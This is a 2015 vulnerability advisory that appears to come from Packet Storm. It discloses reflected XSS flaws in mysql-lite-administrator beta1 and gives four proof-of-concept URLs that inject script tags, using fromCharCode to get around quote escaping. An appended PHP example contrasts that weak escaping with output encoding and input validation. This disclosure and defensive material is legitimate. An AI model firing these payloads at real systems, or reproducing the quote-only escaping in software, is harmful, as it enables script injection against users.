Source: packetstorm | Author: Hyp3rlinx | ID: PACKETSTORM:132420
History: Jun 22, 2015 - 12:00 a.m.

MySQL Lite Administrator Beta 1 Cross Site Scripting


EPSS: 0.002 (Low), percentile 59.6%

`[+] Credits: hyp3rlinx  
  
[+] Domains: hyp3rlinx.altervista.org  
  
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-MYSQLLITEADMINISTRATOR0621.txt  
  
  
Vendor:  
=============================================  
code.google.com/p/mysql-lite-administrator  
  
  
Product:  
==================================================  
mysql-lite-administrator(beta1)  
  
  
Advisory Information:  
==============================  
Multiple XSS vulnerabilities  
  
  
  
Vulnerability Details:  
======================  
mysql-lite-administrator is vulnerable to XSS attacks. The application escapes  
quotes in injected strings, e.g. 'HELL' becomes \'HELL\', but that is easily  
defeated using the JavaScript functions String.charCodeAt() &  
String.fromCharCode(), which build strings without any quote characters.  
  
  
XSS Exploit code(s):  
====================  
  
http://localhost/mysql-lite-administrator(beta1)/mysql-lite-administrator(beta1)/tabella.php?table_name=  
<script>alert(String.fromCharCode(72,69,76,76))</script>  
  
http://localhost/mysql-lite-administrator(beta1)/mysql-lite-administrator(beta1)/coloni.php?num_row=1&table_name=  
<script>alert(666)</script>  
  
http://localhost/mysql-lite-administrator(beta1)/mysql-lite-administrator(beta1)/coloni.php?num_row=  
"><script>alert(String.fromCharCode(72,69,76,76))</script>  
  
http://localhost/mysql-lite-administrator(beta1)/mysql-lite-administrator(beta1)/insert.php?table_name=  
<script>alert(666)</script>  
  
  
Disclosure Timeline:  
=========================================================  
Vendor Notification: NA  
June 21, 2015 : Public Disclosure  
  
  
  
Severity Level:  
=========================================================  
Med  
  
  
  
Description:  
==========================================================  
  
Request Method(s): [+] GET  
  
  
Vulnerable Product: [+] mysql-lite-administrator (beta1)  
  
  
Vulnerable Parameter(s): [+] table_name, num_row  
  
  
Affected Area(s): [+] tabella.php & coloni.php  
  
  
===============================================================  
  
[+] Disclaimer  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and that due  
credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit is given to  
the author. The author is not responsible for any misuse of the information  
contained herein and prohibits any malicious use of all security related  
information or exploits by the author or elsewhere.  
  
  
(hyp3rlinx)  
`
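
Why the quote-escaping described under "Vulnerability Details" does not stop script injection, and what output encoding and input validation do instead. This is an added example, not code from mysql-lite-administrator or from the advisory's author. It assumes the application's escaping behaves like PHP's addslashes(); the function names, the table-name allow-list and the num_row range are hypothetical.

```php
<?php
// Added illustration; not mysql-lite-administrator source code.
// Assumption: the app's escaping acts like addslashes() ('HELL' -> \'HELL\').

// Weak: only quotes and backslashes are escaped; < and > pass through untouched.
function render_weak(string $tableName): string
{
    return '<h2>Table: ' . addslashes($tableName) . '</h2>';
}

// Hardened: encode for the HTML context at the point of output.
function render_safe(string $tableName): string
{
    $encoded = htmlspecialchars($tableName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2>Table: ' . $encoded . '</h2>';
}

// num_row is a count: validate it as an integer instead of escaping it.
// The 0..1000 range is a constructed limit for this example.
function parse_num_row(string $raw): ?int
{
    $opts = ['options' => ['min_range' => 0, 'max_range' => 1000]];
    $n = filter_var($raw, FILTER_VALIDATE_INT, $opts);
    return $n === false ? null : $n;
}

// table_name: allow-list check (hypothetical policy: letters, digits, _; max 64).
function is_valid_table_name(string $raw): bool
{
    return preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $raw) === 1;
}

// Inputs: one constructed benign value plus two strings quoted in the advisory.
$inputs = [
    "users",
    "'HELL'",
    '<script>alert(String.fromCharCode(72,69,76,76))</script>',
];

foreach ($inputs as $in) {
    echo "input : $in\n";
    echo "weak  : " . render_weak($in) . "\n";
    echo "safe  : " . render_safe($in) . "\n";
    echo "valid : " . (is_valid_table_name($in) ? 'yes' : 'no') . "\n\n";
}

// The num_row string from the advisory is rejected; a plain integer is accepted.
var_dump(parse_num_row('"><script>alert(String.fromCharCode(72,69,76,76))</script>'));
var_dump(parse_num_row('1'));
```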
